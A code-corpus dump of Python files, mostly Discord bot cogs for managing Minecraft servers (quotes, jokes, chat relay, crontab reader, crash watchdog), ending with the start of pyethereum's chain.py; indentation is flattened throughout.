log.warning(f'{id} could not be resolved; removed from quotes!')
del self.quotes[id]
await self.quotes.save()
return None
if member.nick:
return member.nick
else:
return member.name
members = '\n'.join(filter(None, [await getName(id) for id in list(self.quotes.keys())]))
await ctx.send(f'I have quotes from these members:\n ```\n{members}\n```')
@quote.command(aliases=['delete', 'unquote'])
async def remove(self, ctx, member: discord.Member, *, _index: int):
"""Remove a specific quote.
Takes the user who was quoted, and
the ID of the quote to be removed,
which is shown at the bottom of each
quote.
Only the user who saved the quote,
and the quoted user can do this.
"""
if str(member.id) in self.quotes:
id = str(member.id)
log.info('Removing a quote!')
try:
if ctx.author.id == member.id or \
ctx.author.id == self.quotes[id][_index]['savedBy']:
del self.quotes[id][_index]
await ctx.send('We shall never speak of it again, sir!')
await self.quotes.save()
else:
await ctx.send('I am sorry, sir, but you are neither the quotee, '
'nor the person who requested this quote to be saved.')
except (KeyError, IndexError):
log.info('Unknown quote, cannot remove!')
await ctx.send('Sorry sir, I don\'t seem to have a record of this quote.')
else:
log.info('Unknown member!')
await ctx.send('Sorry lass, I don\'t seem to have heard of this person before.')
@quote.command(name='list')
async def _list(self, ctx, member: discord.Member):
"""List all quotes from a specific user.
Quotes are presented as a nice flipbook, for
easy and non-spammy perusal!
"""
if str(member.id) in self.quotes:
id = str(member.id)
log.info('Showing quotes!')
quotelist = []
for index, quotemeta in enumerate(self.quotes[id]):
quote = quotemeta['quote']
quotelist.append(f'#{index}: {quote:.50}')
if member.nick:
name = member.nick
else:
name = member.name
quoteFlip = Flipbook(ctx, quotelist, entries_per_page=12,
title=f'Shit {name} says!',
color=discord.Color.blurple(),
close_on_exit=True)
await quoteFlip.flip()
else:
log.info('Unknown member!')
await ctx.send('Sorry lass, I don\'t seem to have heard of this person before.')
def setup(bot):
bot.register_nodes([f'{__name__}.quote'])
bot.add_cog(Quotator(bot))
```
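For reference, the quotes.json maintained above is keyed by the quoted user's ID as a string, each entry holding the quote text and the ID of whoever saved it; an illustrative shape with made-up IDs:
```python
# Illustrative shape of data/quotes.json (IDs are made up).
quotes = {
    "123456789012345678": [
        {"quote": "I meant to do that.", "savedBy": 876543210987654321},
        {"quote": "Locked and reloaded!", "savedBy": 246813579024681357},
    ]
}
```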
#### File: Charfred_Cogs/funcogs/chuck.py
```python
import logging
from discord.ext import commands
log = logging.getLogger('charfred')
class Chuck(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.session = bot.session
@commands.group(invoke_without_command=True, aliases=['chuck', 'roundhouse'])
@commands.cooldown(60, 60)
async def norris(self, ctx):
"""Interactions with ChuckNorrisJokes API.
This gets a random joke, if no subcommand was given.
"""
log.info('Getting random chuck joke.')
async with self.session.get('https://api.chucknorris.io/jokes/random') as r:
joke = await r.json()
await ctx.send(f"`{joke['value']}`")
@norris.command()
async def category(self, ctx, category: str=None):
"""Get a random joke from a category!
If no category is given, this will return
the list of all categories.
"""
if category is None:
log.info('Retrieving categories.')
async with self.session.get('https://api.chucknorris.io/jokes/categories') as r:
cats = await r.json()
cats = ', '.join(cats)
await ctx.send(f'Available categories: `{cats}`')
else:
log.info(f'Trying for a random joke from {category}.')
async with self.session.get(f'https://api.chucknorris.io/jokes/random?category={category}') as r:
joke = await r.json()
await ctx.send(f"`{joke['value']}`")
def setup(bot):
bot.add_cog(Chuck(bot))
```
#### File: Charfred_Cogs/funcogs/entertain.py
```python
import logging
import random
import asyncio
from discord.ext import commands
log = logging.getLogger('charfred')
dances = [
[u"└|゚ε゚|┐", u"┌|゚з゚|┘", u"└|゚ε゚|┐", u"┌|゚з゚|┘", u"└|゚ε゚|┐", u"┌|゚з゚|┘"],
[u"└|∵┌|", u"|┐∵|┘", u"└|∵┌|", u"|┐∵|┘", u"└|∵┌|", u"|┐∵|┘"],
[u"(o^^)o", u"o(^^o)", u"(o^^)o", u"o(^^o)", u"(o^^)o", u"o(^^o)"],
[u"|o∵|o", u"o|∵o|", u"|o∵|o", u"o|∵o|", u"|o∵|o", u"o|∵o|"],
[u"(ノ ̄ー ̄)ノ", u"(〜 ̄△ ̄)〜", u"(ノ ̄ω ̄)ノ", u"(ノ ̄ー ̄)ノ", u"(〜 ̄△ ̄)〜", u"(ノ ̄ω ̄)ノ"]
]
faces = [
u"(´﹃`)", u"(・ε・`)", u"(ง •̀ω•́)ง✧", u"╭( ・ㅂ・)و", u"ಠ‿↼", u"d(-_^)", u"d(´・ω・`)",
u"٩(^ᴗ^)۶", u"ಥ◡ಥ", u"⚈ ̫ ⚈", u"∠(^ー^)", u"(^-^)ゝ", u"(∩^o^)⊃━☆゚.*・。゚", u"ლ(・ヮ・ლ)"
]
pleasures = [
'My pleasure, sir!', 'My pleasure, ma\'am', 'You are very welcome, sir!',
'You are very welcome, madam!', 'Of course, your highness!', 'Of course, your ladyship!',
'M\'lord *tips tophat*', 'Indubitably!', 'Fuck you!', '...', ' '
]
loves = [
u"•́ε•̀٥", u"˶⚈Ɛ⚈˵", u"(・ε・`)", u"(~ ̄³ ̄)~", u".+(´^ω^`)+.", u"゚*。(・∀・)゚*。", u"",
u"(∩^o^)⊃━☆゜.*", u"ಠ◡ಠ", u"ʢᵕᴗᵕʡ", u"(^¬^)", u"(º﹃º)", u"ಠ_ರೃ", u"d(´・ω・`)"
]
gn9s = [
'Good night, sir!', 'Good night!', 'Nighty night!', 'Sweet dreams!',
'Sleep well!', 'Don\'t let the bedbugs bite!', 'Pleasant dreams!',
'Glorious dreams to you, too!'
]
shrugs = [
u"┐( ̄ヘ ̄)┌", u"ლ(╹ε╹ლ)", u"ლ(ಠ益ಠ)ლ", u"¯\_(⊙_ʖ⊙)_/¯",
u"¯\_(ツ)_/¯", u"┐(´ー`)┌", u"乁༼☯‿☯✿༽ㄏ", u"╮(╯_╰)╭"
]
shocks = [
u"(ʘᗩʘ’)", u"(ʘ言ʘ╬)", u"(◯Δ◯∥)", u"(●Ω●;)"
]
spins = [
[u"(・ω・)", u"( ・ω)", u"( ・)", u"( )", u"(・ )", u"(ω・ )", u"(・ω・)"],
[u"(´・ω・`)", u"( ´・ω・)", u"( ´・ω)", u"( )", u"( )", u"(ω・´ )", u"(・ω・´)", u"(`・ω・´)"],
[u"(・▽・)", u"( ・▽)", u"( ・)", u"( )", u"(・ )", u"(▽・ )", u"(・▽・)"],
[u"(・_・)", u"( ・_)", u"( ・)", u"( )", u"(・ )", u"(_・ )", u"(・_・)"],
[u"(°o°)", u"(°o。)", u"(。o。)", u"(。o°)", u"(°o°)", u"(°o。)", u"(。o。)", u"(。o°)"]
]
class Entertain(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
@commands.command(aliases=['partytime'])
async def dance(self, ctx):
dance = random.choice(dances)
step = await ctx.send(dance[0], deletable=False)
await asyncio.sleep(2, loop=self.loop)
for move in dance[1:]:
await step.edit(content=move)
await asyncio.sleep(2, loop=self.loop)
else:
await step.add_reaction('👍')
@commands.command(aliases=['youspinmerightroundbabyrightround'])
async def spin(self, ctx):
spin = random.choice(spins)
step = await ctx.send(spin[0], deletable=False)
await asyncio.sleep(2, loop=self.loop)
for turn in spin[1:]:
await step.edit(content=turn)
await asyncio.sleep(2, loop=self.loop)
else:
await step.add_reaction('👍')
@commands.command(aliases=['*shrug*'])
async def shrug(self, ctx):
await ctx.send(random.choice(shrugs))
@commands.command(aliases=['jikes'])
async def shock(self, ctx):
await ctx.send(random.choice(shocks))
@commands.command(aliases=['flip', 'table'])
async def tableflip(self, ctx):
unflipped = await ctx.send(u"(ಠ_ಠ) ┳━┳", deletable=False)
await asyncio.sleep(2, loop=self.loop)
await unflipped.edit(content=u"(╯ಠ_ಠ)╯︵┻━┻")
@commands.command(aliases=['thank'])
async def thanks(self, ctx):
await ctx.send(random.choice(pleasures) + ' ' +
random.choice(faces))
@commands.command(aliases=['gn9', 'gn8', 'goodnight', 'nn'])
async def gn(self, ctx):
await ctx.send(random.choice(gn9s) + ' ' +
random.choice(loves))
def setup(bot):
bot.add_cog(Entertain(bot))
```
#### File: Charfred_Cogs/minecraftcogs/chatrelay.py
```python
import logging
import asyncio
from concurrent.futures import CancelledError
from discord.ext import commands
from utils import Config, permission_node
log = logging.getLogger('charfred')
formats = {
'MSG': '[**{}**] {}: {}',
'STF': '**{}**: {}',
'DTH': '[**{}**] {} {}',
'ME': '[**{}**] {}: {}',
'SAY': '[**{}**] {}: {}',
'SYS': '{}'
}
def escape(string):
return string.strip().replace('\n', '\\n').replace('::', ':\\:').replace('::', ':\\:')
class ChatRelay(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.server = None
self.inqueue = asyncio.Queue(maxsize=64, loop=self.loop)
self.clients = {}
self.inqueue_worker_task = None
self.relaycfg = Config(f'{bot.dir}/configs/chatrelaycfg.toml',
load=True, loop=self.loop)
if 'ch_to_clients' not in self.relaycfg:
self.relaycfg['ch_to_clients'] = {}
self.relaycfg._save()
if 'client_to_ch' not in self.relaycfg:
self.relaycfg['client_to_ch'] = {}
self.relaycfg._save()
def cog_unload(self):
if self.server:
log.info('CR: Closing relay server.')
self.server.close()
if self.inqueue_worker_task:
self.inqueue_worker_task.cancel()
if self.clients:
for client in self.clients.values():
try:
client['workers'][0].cancel()
client['workers'][1].cancel()
except KeyError:
pass
self.loop.create_task(self.server.wait_closed())
@commands.Cog.listener()
async def on_message(self, message):
if self.server is None: # Don't even do anything if the server isn't running.
return
if message.author.bot or (message.guild is None):
return
ch_id = str(message.channel.id)
if message.content and (ch_id in self.relaycfg['ch_to_clients']):
# Check whether the message is a command, as determined
# by having a valid prefix, and don't proceed if it is.
prefix = await self.bot.get_prefix(message)
if isinstance(prefix, str):
if message.content.startswith(prefix):
return
else:
try:
if message.content.startswith(tuple(prefix)):
return
except TypeError:
# If we get here, then the prefixes are borked.
raise
content = f'MSG::Discord::{escape(message.author.display_name)}:' \
f':{escape(message.clean_content)}::\n'
for client in self.relaycfg['ch_to_clients'][ch_id]:
try:
self.clients[client]['queue'].put_nowait((5, content))
except KeyError:
pass
except asyncio.QueueFull:
pass
@commands.group(invoke_without_command=True)
async def chatrelay(self, ctx):
"""Minecraft chat relay commands.
This returns a list of all Minecraft servers currently
connected and what channel they're linked to.
"""
info = ['# Chat Relay Status:']
if self.server and self.server.sockets:
info.append('\n# Relay server is online.\n')
else:
info.append('\n< Relay server is offline! >\n')
if self.clients:
info.append('\n# Currently connected clients:')
for client in self.clients:
info.append(f'- {client}')
if self.relaycfg['ch_to_clients']:
info.append('\n# Relay configuration:')
for channel_id, clients in self.relaycfg['ch_to_clients'].items():
channel = self.bot.get_channel(int(channel_id))
info.append(f'{channel.name if channel else channel_id}:')
if clients:
for client in clients:
info.append(f'- {client}')
else:
info.append('\n')
else:
info.append('> No clients configured.\n')
if len(info) == 2:
info.append('> No clients connected, nothing configured.')
await ctx.sendmarkdown('\n'.join(info))
async def incoming_worker(self, reader, client):
log.info(f'CR-Incoming: Worker for {client} started.')
try:
while True:
data = await reader.readline()
if not data:
log.info(f'CR-Incoming: {client} appears to have disconnected!')
break
try:
data = data.decode()
except UnicodeDecodeError as e:
log.info(f'CR-Incoming: {e}')
continue
try:
self.inqueue.put_nowait((client, data))
except asyncio.QueueFull:
log.warning(f'CR-Incoming: Incoming queue full, message dropped!')
except CancelledError:
raise
finally:
log.info(f'CR-Incoming: Worker for {client} exited.')
async def outgoing_worker(self, writer, client):
log.info(f'CR-Outgoing: Worker for {client} started.')
try:
while True:
try:
_, data = await self.clients[client]['queue'].get()
except (KeyError, AttributeError):
log.error(f'CR-Outgoing: Outqueue for {client} is gone!'
' Connection shutting down!')
break
else:
data = data.encode()
writer.write(data)
await writer.drain()
except CancelledError:
raise
finally:
log.info(f'CR-Outgoing: Worker for {client} exited.')
async def connection_handler(self, reader, writer):
peer = str(writer.get_extra_info("peername"))
log.info(f'CR-Connection: New connection established with {peer}!')
handshake = await reader.readline()
if not handshake:
log.warning(f'CR-Connection: No handshake from {peer} received!'
' Connection shutting down!')
writer.close()
return
handshake = handshake.decode()
hshk = handshake.split('::')
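# Expected handshake line: 'HSHK::<client name>::...'; the first field tags it, the second names the client.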
if hshk[0] == 'HSHK':
try:
client = hshk[1]
except IndexError:
log.warning(f'CR-Connection: Invalid handshake: {handshake}')
client = None
else:
log.warning(f'CR-Connection: Invalid handshake: {handshake}')
client = None
if client is None:
log.warning(f'CR-Connection: Using client address as name.')
client = peer
await self.inqueue.put((client, f'SYS::```markdown\n# {client} connected!\n```'))
if client in self.clients and self.clients[client]:
if 'workers' in self.clients[client]:
log.warning(f'CR-Connection: {client} reconnecting after messy exit, cleaning up!')
for worker in self.clients[client]['workers']:
worker.cancel()
self.clients[client] = {}
self.clients[client]['queue'] = asyncio.PriorityQueue(maxsize=24, loop=self.loop)
in_task = self.loop.create_task(self.incoming_worker(reader, client))
out_task = self.loop.create_task(self.outgoing_worker(writer, client))
self.clients[client]['workers'] = (in_task, out_task)
_, waiting = await asyncio.wait([in_task, out_task],
return_when=asyncio.FIRST_COMPLETED)
for task in waiting:
task.cancel()
try:
baggage = self.clients.pop(client)
except KeyError:
pass
else:
log.info(f'CR-Connection: Outqueue for {client} removed with'
f' {baggage["queue"].qsize()} items.')
writer.close()
log.info(f'CR-Connection: Connection with {client} closed!')
await self.inqueue.put((client, f'SYS::```markdown\n< {client} disconnected! >\n```'))
async def inqueue_worker(self):
log.info('CR-Inqueue: Worker started!')
try:
while True:
client, data = await self.inqueue.get()
# Check if the data has a valid format.
_data = data.split('::')
if _data[0] not in formats:
log.debug(f'CR-Inqueue: Data from {client} with invalid format: {data}')
continue
# If we get here, then the format is valid and we can relay to other clients.
if _data[0] != 'SYS':
for other in self.clients:
if other == client:
continue
try:
self.clients[other]['queue'].put_nowait((5, data))
except KeyError:
pass
except asyncio.QueueFull:
pass
# Check if we have a channel to send this message to.
if client not in self.relaycfg['client_to_ch']:
log.debug(f'CR-Inqueue: No channel for: "{client} : {data}", dropping!')
continue
# If we get here, we have a channel and can process according to format map.
channel = self.bot.get_channel(int(self.relaycfg['client_to_ch'][client]))
if not channel:
log.warning(f'CR-Inqueue: {_data[0]} message from {client} could not be sent.'
' Registered channel does not exist!')
continue
try:
await channel.send(formats[_data[0]].format(*_data[1:]))
except IndexError as e:
log.debug(f'{e}: {data}')
pass
except CancelledError:
raise
finally:
log.info('CR-Inqueue: Worker exited.')
@chatrelay.command(aliases=['start', 'init'])
@permission_node(f'{__name__}.init')
async def initialize(self, ctx, port):
"""This initializes the relay server on the given port,
allowing connections from Minecraft servers to be established.
Be sure to also set up at least one channel to relay chat
to and from, using the 'register' subcommand, otherwise
chat received from clients will just be dropped!
"""
if self.server:
log.warning('CR: Server already established!')
await ctx.sendmarkdown('> Relay server already running!')
return
self.inqueue_worker_task = self.loop.create_task(self.inqueue_worker())
self.server = await asyncio.start_server(self.connection_handler, '127.0.0.1', port,
loop=self.loop)
log.info('CR: Server started!')
await ctx.sendmarkdown('# Relay server started.')
@chatrelay.command(aliases=['stop'])
@permission_node(f'{__name__}.init')
async def close(self, ctx):
"""This closes the relay server, disconnecting all clients.
"""
if not self.server:
log.info('CR: No server to be closed.')
await ctx.sendmarkdown('> No relay server to be closed.')
return
self.server.close()
if self.inqueue_worker_task:
self.inqueue_worker_task.cancel()
if self.clients:
for client in self.clients.values():
try:
client['workers'][0].cancel()
client['workers'][1].cancel()
except KeyError:
pass
await self.server.wait_closed()
log.info('CR: Server closed!')
self.server = None
await ctx.sendmarkdown('# Relay server closed, all clients disconnected!')
@chatrelay.command(aliases=['listen'])
@permission_node(f'{__name__}.register')
async def register(self, ctx, client: str):
"""Registers a channel to recieve chat from a given client,
and send chat from the channel to the client.
The channel you run this in will be the registered channel.
You can get a list of clients by just running 'chatrelay'
without a subcommand.
"""
channel_id = str(ctx.channel.id)
if client not in self.clients:
await ctx.sendmarkdown('< Client unknown, registering anyway. >\n'
'< Please check if you got the name right,'
' when the client eventually connects. >')
log.info(f'CR: Trying to register {ctx.channel.name} for {client}.')
if client in self.relaycfg['client_to_ch'] and self.relaycfg['client_to_ch'][client]:
channel = self.bot.get_channel(int(self.relaycfg['client_to_ch'][client]))
if channel == ctx.channel:
await ctx.sendmarkdown(f'> {client} is already registered with this channel!')
else:
await ctx.sendmarkdown(f'< {client} is already registered with {channel.name}! >\n'
'> A client can only be registered to one channel.\n'
'> Please unregister the other channel first!')
return
else:
self.relaycfg['client_to_ch'][client] = channel_id
if channel_id in self.relaycfg['ch_to_clients']:
self.relaycfg['ch_to_clients'][channel_id].append(client)
else:
self.relaycfg['ch_to_clients'][channel_id] = [client]
await self.relaycfg.save()
await ctx.sendmarkdown(f'# {ctx.channel.name} is now registered for'
f' receiving chat from, and sending chat to {client}.')
@chatrelay.command(aliases=['unlisten'])
@permission_node(f'{__name__}.register')
async def unregister(self, ctx, client: str):
"""Unregisters a channel from recieving chat from a given
client or sending chat to that client.
The channel you run this in will be the unregistered channel.
You can get a list of clients by just running 'chatrelay'
without a subcommand.
"""
channel_id = str(ctx.channel.id)
log.info(f'CR: Trying to unregister {ctx.channel.name} for {client}.')
if client in self.relaycfg['client_to_ch']:
if self.relaycfg['client_to_ch'][client] == channel_id:
del self.relaycfg['client_to_ch'][client]
else:
await ctx.sendmarkdown(f'< {client} is not registered for this channel! >')
return
try:
self.relaycfg['ch_to_clients'][channel_id].remove(client)
except ValueError:
log.critical(f'CR: Relay mapping inconsistency detected!')
raise
else:
await ctx.sendmarkdown('# This channel will no longer send chat to'
f' or receive chat from {client}!')
finally:
await self.relaycfg.save()
else:
await ctx.sendmarkdown(f'> {client} is not registered with any channel.')
def setup(bot):
permission_nodes = ['init', 'register']
bot.register_nodes([f'{__name__}.{node}' for node in permission_nodes])
bot.add_cog(ChatRelay(bot))
```
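Clients of the chat relay speak a newline-delimited, '::'-separated protocol: a 'HSHK::<name>::' line first, then messages whose first field is one of the keys of the formats dict above, e.g. 'MSG::<server>::<author>::<text>::'. A minimal game-server-side client sketch (name and port are placeholders):
```python
# Minimal chat relay client sketch; 'Survival' and the port are placeholders.
import asyncio

async def relay_client(port=20000, name='Survival'):
    reader, writer = await asyncio.open_connection('127.0.0.1', port)
    writer.write(f'HSHK::{name}::\n'.encode())        # identify ourselves first
    writer.write(f'MSG::{name}::Steve::Hello from the server!::\n'.encode())
    await writer.drain()
    # Lines pushed by the relay (e.g. Discord chat) arrive on `reader`.
    line = await reader.readline()
    print(line.decode().rstrip())
    writer.close()
```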
#### File: Charfred_Cogs/minecraftcogs/cronreader.py
```python
from discord.ext import commands
import re
import asyncio
import logging
from utils import permission_node, Flipbook
log = logging.getLogger('charfred')
cronpat = re.compile(r'^(?P<disabled>#)*((?P<reboot>@reboot)|(?P<min>(\*/\d+|\*|(\d+,?)+))\s(?P<hour>(\*/\d+|\*|(\d+,?)+))\s(?P<day>(\*/\d+|\*|(\d+,?)+)))\s.*spiffy\s(?P<cmd>\w+)\s(?P<server>\w+)\s(?P<args>.*)>>')
every = '*/'
always = '*'
class CronReader(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.servercfg = bot.servercfg
def _parseCron(self, crontab):
parsedlines = []
for l in crontab:
if 'spiffy' not in l:
continue
match = cronpat.match(l)
if not match:
continue
disabled, reboot, min, hour, day, cmd, server, args = match.group('disabled',
'reboot',
'min', 'hour',
'day', 'cmd',
'server', 'args')
state = '# ' if disabled else ''
if reboot:
condition = 'Runs at reboot:'
output = f'{state}{condition} {cmd} {server}'
if args:
output += f' {args}'
parsedlines.append(output)
else:
condition = 'Runs'
if every in min:
m = f'every {min[2:]} minutes'
elif always in min:
m = 'every minute'
else:
m = f'at {min} minutes'
if every in hour:
h = f'every {hour[2:]} hours'
elif always in hour:
h = 'every hour'
else:
h = f'at {hour} hours'
if every in day:
d = f'every {day[2:]} days'
elif always in day:
d = 'every day'
else:
d = f'on these days: {day}'
output = f'{state}{condition} {m}, {h}, {d}: {cmd} {server}'
if args:
output += f' {args}'
parsedlines.append(output)
return parsedlines
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}.read')
async def cron(self, ctx):
"""Crontab commands.
This returns an overview of cronjobs that apply to any known Minecraft
servers managed by Charfred\'s \'spiffy\' script, if no subcommand was given.
"""
log.info('Fetching current crontab...')
proc = await asyncio.create_subprocess_exec(
'crontab',
'-l',
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await proc.communicate()
if proc.returncode == 0:
log.info('Crontab retrieved successfully.')
else:
log.warning('Failed to retrieve crontab!')
return
crontab = stdout.decode().strip().split('\n')
log.info('Parsing crontab...')
spiffycron = await self.loop.run_in_executor(None, self._parseCron, crontab)
cronFlip = Flipbook(ctx, spiffycron, entries_per_page=8, title='Spiffy Cronjobs',
close_on_exit=True)
await cronFlip.flip()
def setup(bot):
bot.register_nodes([f'{__name__}.read'])
bot.add_cog(CronReader(bot))
```
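To make the cronpat groups concrete, here is the same pattern applied to a made-up crontab line (the spiffy path and log file are illustrative):
```python
# Demo of the crontab pattern used above, applied to a made-up crontab line.
import re

cronpat = re.compile(r'^(?P<disabled>#)*((?P<reboot>@reboot)|(?P<min>(\*/\d+|\*|(\d+,?)+))\s(?P<hour>(\*/\d+|\*|(\d+,?)+))\s(?P<day>(\*/\d+|\*|(\d+,?)+)))\s.*spiffy\s(?P<cmd>\w+)\s(?P<server>\w+)\s(?P<args>.*)>>')

line = '*/30 * * root /usr/local/bin/spiffy restart survival >> /var/log/spiffy.log 2>&1'
m = cronpat.match(line)
print(m.group('min', 'hour', 'day', 'cmd', 'server'))
# ('*/30', '*', '*', 'restart', 'survival'), which _parseCron renders as
# "Runs every 30 minutes, every hour, every day: restart survival"
```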
#### File: Charfred_Cogs/minecraftcogs/serverwatchdog.py
```python
from discord.ext import commands
from discord.utils import find
import asyncio
import logging
import re
from time import strftime, localtime, time
from threading import Event
from utils import Config, permission_node
from .utils import isUp, getProc, serverStart, getcrashreport, parsereport, formatreport
log = logging.getLogger('charfred')
cronpat = re.compile(r'^(?P<disabled>#)*((?P<reboot>@reboot)|(?P<min>(\*/\d+|\*|(\d+,?)+))\s(?P<hour>(\*/\d+|\*|(\d+,?)+))\s(?P<day>(\*/\d+|\*|(\d+,?)+)))\s.*spiffy\s(?P<cmd>\w+)\s(?P<server>\w+)\s(?P<args>.*)>>')
every = '*/'
always = '*'
class Watchdog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.servercfg = bot.servercfg
self.watchdogs = {}
self.watchcfg = Config(f'{bot.dir}/configs/watchcfg.json',
load=True, loop=self.loop)
if 'notify' not in self.watchcfg:
self.watchcfg['notify'] = '@here'
def cog_unload(self):
if self.watchdogs:
for fut, event in self.watchdogs.values():
event.set()
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}.watchdog')
async def watchdog(self, ctx):
"""Server process watchdog commands.
This returns a list of all active watchdogs,
if no subcommand was given.
"""
for server, wd in self.watchdogs.items():
if wd[0].done():
await ctx.sendmarkdown(f'< {server} watchdog inactive! >')
else:
await ctx.sendmarkdown(f'# {server} watchdog active!')
@watchdog.command(aliases=['blame'])
async def setmention(self, ctx, mentionee: str):
"""Set who to mention for crash notification."""
log.info(f'Setting role to mention to: {mentionee}.')
role = find(lambda r: r.name == mentionee, ctx.guild.roles)
if role:
self.watchcfg['notify'] = role.mention
await ctx.sendmarkdown(f'# Set role to mention to: {mentionee}!\n'
'> They will be notified if a crash is suspected,\n'
'> given that mentioning is enabled.')
await self.watchcfg.save()
log.info('Watchdog cfg saved!')
else:
await ctx.sendmarkdown(f'< {mentionee} is not a valid role! >')
log.warning('Role could not be found, role to mention unchanged.')
async def _wdstart(self, ctx, server):
if server in self.watchdogs and not self.watchdogs[server][0].done():
log.info(f'{server} watchdog active.')
await ctx.sendmarkdown('# Watchdog already active!')
else:
if server not in self.servercfg['servers']:
log.warning(f'{server} has been misspelled or not configured!')
await ctx.sendmarkdown(f'< {server} has been misspelled or not configured! >')
return
if isUp(server):
log.info('Starting watchdog on online server.')
await ctx.sendmarkdown(f'# {server} is up and running.', deletable=False)
else:
log.info('Starting watchdog on offline server.')
await ctx.sendmarkdown(f'< {server} is not running. >', deletable=False)
async def serverGone(crashed, report=None):
if crashed:
await ctx.send(
f'{self.watchcfg["notify"]}\n'
'```markdown\n'
f'< {strftime("%H:%M", localtime())} : {server} crashed! >\n'
'```',
deletable=False
)
for c in report:
await asyncio.sleep(1, loop=self.loop)
await ctx.sendmarkdown(c)
else:
await ctx.sendmarkdown(f'> {strftime("%H:%M", localtime())} : {server} is gone!\n'
'> Watching for it to return...', deletable=False)
async def serverBack():
await ctx.sendmarkdown('# ' + strftime("%H:%M") + f' {server} is back online!\n'
'> Continuing watch!', deletable=False)
async def watchGone():
await ctx.sendmarkdown(f'> Ended watch on {server}!', deletable=False)
async def startServer():
# TODO: Remove message informing about the change from 'react to restart' to 'react to abort'
abortPrompt = await ctx.sendmarkdown(
'< IMPORTANT NOTE: The purpose of this prompt has changed, please read it carefully! >\n\n'
f'# Attempting to start {server} back up again in 90 seconds!\n'
'< Please react to this message with ✋ to abort! >',
deletable=False
)
await abortPrompt.add_reaction('✋')
def abortcheck(reaction, user):
if reaction.message.id != abortPrompt.id:
return False
return str(reaction.emoji) == '✋' and not user.bot
log.info(f'Prompting {server} start abort... 90 seconds.')
try:
await self.bot.wait_for('reaction_add', timeout=90, check=abortcheck)
except asyncio.TimeoutError:
log.info('Prompt timed out.')
await abortPrompt.clear_reactions()
await abortPrompt.edit(content='```markdown\n> Prompt to abort'
' timed out!\n```')
await asyncio.sleep(5, loop=self.loop)
if isUp(server):
log.info(f'{server} is already back!')
await abortPrompt.edit(content=f'```markdown\n> {server} is already back!\n```')
else:
log.info(f'Starting {server}')
await abortPrompt.edit(content=f'```markdown\n> Starting {server}...\n```')
await serverStart(server, self.servercfg, self.loop)
else:
await abortPrompt.clear_reactions()
await abortPrompt.edit(content=f'```markdown\n> Startup of {server} aborted!\n```')
def watchDone(future):
log.info(f'WD: Ending watch on {server}.')
if future.exception():
log.warning(f'WD: Exception in watchdog for {server}!')
raise future.exception()
asyncio.run_coroutine_threadsafe(watchGone(), self.loop)
def watch(event):
log.info(f'WD: Starting watch on {server}.')
serverProc = getProc(server)
if serverProc and serverProc.is_running():
lastState = True
else:
lastState = False
while not event.is_set():
if lastState:
if not serverProc.is_running():
log.info(f'WD: {server} is gone!')
lastState = False
now = time()
rpath, mtime = getcrashreport(server, self.servercfg['serverspath'])
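# A crash report modified within the last 60 seconds is treated as evidence of a crash.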
if mtime > (now - 60):
crashed = True
ctime, desc, strace, flav, lev, bl, ph = parsereport(rpath)
report = formatreport(
rpath, ctime, desc, flav, strace, lev, bl, ph
)
coro = serverGone(crashed, report)
else:
crashed = False
coro = serverGone(crashed)
asyncio.run_coroutine_threadsafe(coro, self.loop)
if crashed:
asyncio.run_coroutine_threadsafe(startServer(), self.loop)
event.wait(timeout=30)
event.wait(timeout=20)
else:
serverProc = getProc(server)
if serverProc and serverProc.is_running():
log.info(f'WD: {server} is back online!')
lastState = True
asyncio.run_coroutine_threadsafe(serverBack(), self.loop)
event.wait(timeout=20)
else:
event.wait(timeout=30)
else:
return
event = Event()
watchFuture = self.loop.run_in_executor(None, watch, event)
watchFuture.add_done_callback(watchDone)
self.watchdogs[server] = (watchFuture, event)
await ctx.sendmarkdown('# Watchdog activated!', deletable=False)
@watchdog.command(name='activate', aliases=['start', 'watch'])
async def wdstart(self, ctx, *servers: str):
"""Start the process watchdog for a server."""
for server in servers:
await self._wdstart(ctx, server)
@watchdog.command(name='deactivate', aliases=['stop', 'unwatch'])
async def wdstop(self, ctx, server: str):
"""Stop the process watchdog for a server."""
if server in self.watchdogs and not self.watchdogs[server][0].done():
watcher = self.watchdogs[server]
watcher[1].set()
await ctx.sendmarkdown(f'> Terminating {server} watchdog...', deletable=False)
else:
if server not in self.servercfg['servers']:
log.warning(f'{server} has been misspelled or not configured!')
await ctx.sendmarkdown(f'< {server} has been misspelled or not configured! >')
else:
await ctx.sendmarkdown('# Watchdog already inactive!', deletable=False)
def setup(bot):
if not hasattr(bot, 'servercfg'):
default = {
"servers": {}, "serverspath": "NONE", "backupspath": "NONE", "oldTimer": 1440
}
bot.servercfg = Config(f'{bot.dir}/configs/serverCfgs.toml',
default=default,
load=True, loop=bot.loop)
bot.register_nodes([f'{__name__}.watchdog'])
bot.add_cog(Watchdog(bot))
``` |
{
"source": "JinKin/pyethereum",
"score": 2
} |
#### File: ethereum/pow/chain.py
```python
from __future__ import print_function
from builtins import range
import json
import random
import time
import itertools
from ethereum import utils
from ethereum.utils import parse_as_bin, big_endian_to_int, is_string
from ethereum.meta import apply_block
from ethereum.common import update_block_env_variables
from ethereum.messages import apply_transaction
import rlp
from rlp.utils import encode_hex
from ethereum.exceptions import InvalidNonce, InsufficientStartGas, UnsignedTransaction, \
BlockGasLimitReached, InsufficientBalance, InvalidTransaction, VerificationFailed
from ethereum.slogging import get_logger, configure_logging
from ethereum.config import Env
from ethereum.state import State, dict_to_prev_header
from ethereum.block import Block, BlockHeader, BLANK_UNCLES_HASH, FakeHeader
from ethereum.pow.consensus import initialize
from ethereum.genesis_helpers import mk_basic_state, state_from_genesis_declaration, \
initialize_genesis_keys
from ethereum.db import RefcountDB
log = get_logger('eth.chain')
config_string = ':info' #,eth.chain:debug'
#config_string = ':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug'
configure_logging(config_string=config_string)
class Chain(object):
def __init__(self, genesis=None, env=None,
new_head_cb=None, reset_genesis=False, localtime=None, max_history=1000, **kwargs):
self.env = env or Env()
# Initialize the state
if b'head_hash' in self.db: # new head tag
